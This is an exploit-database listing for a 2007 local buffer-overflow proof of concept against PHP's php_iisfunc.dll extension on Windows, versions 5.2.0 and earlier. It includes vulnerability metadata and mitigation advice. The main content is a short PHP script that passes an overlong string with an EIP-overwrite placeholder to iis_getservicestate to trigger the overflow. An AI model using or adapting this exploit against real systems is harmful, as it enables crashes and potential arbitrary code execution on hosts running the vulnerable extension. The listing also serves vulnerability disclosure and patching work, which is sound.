php_iisfunc.dll PHP - exploit.company

vendor:

PHP

by:

boecke <boecke@herzeleid.net>

5.5

CVSS

MEDIUM

Buffer Overflow

119

CWE

Product Name: PHP

Affected Version From: PHP <= 5.2.0

Affected Version To: PHP <= 5.2.0

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows (win32)

2007

php_iisfunc.dll PHP <= 5.2.0 (win32) Buffer Overflow PoC

This is a proof-of-concept exploit for a buffer overflow vulnerability in the php_iisfunc.dll extension in PHP versions <= 5.2.0 on the win32 platform. The vulnerability allows an attacker to execute arbitrary code by sending a specially crafted string argument(s) to various functions that convert the string(s) to unicode. The specific functions affected are fnStartService, fnGetServiceState, and fnStopService.

Mitigation:

To mitigate this vulnerability, users should upgrade to a newer version of PHP that is not affected by this issue. Alternatively, users can disable the php_iisfunc.dll extension if it is not required for their application.

Source

Exploit-DB raw data:

<?php
// ==================================================================================
//
//  php_iisfunc.dll PHP <= 5.2.0 (win32) Buffer Overflow PoC
//
//      Discovery: boecke <boecke@herzeleid.net>
//      Risk: Local Buffer Overflow (Medium - High Risk)
//      Notes: Various other functions are exploitable, all of which convert the
//      string argument(s) to unicode.
//
//      extern "C" IISFUNC_API int fnStartService(LPCTSTR ServiceId);
//      extern "C" IISFUNC_API int fnGetServiceState(LPCTSTR ServiceId);
//      extern "C" IISFUNC_API int fnStopService(LPCTSTR ServiceId);
//
//      "Sangre, sonando, de rabia naci.. Who do you trust?"
//       - Cygnus, Vismund Cygnus: Sarcophagi
//
// ==================================================================================

if ( !extension_loaded( "iisfunc" ) )
{
       die( "Extension not loaded.\n" );
}

$buf_unicode = str_repeat( "A", 256 );
$eip_unicode = "\x41\x41";

iis_getservicestate( $buf_unicode . $eip_unicode );

?>

# milw0rm.com [2007-08-27]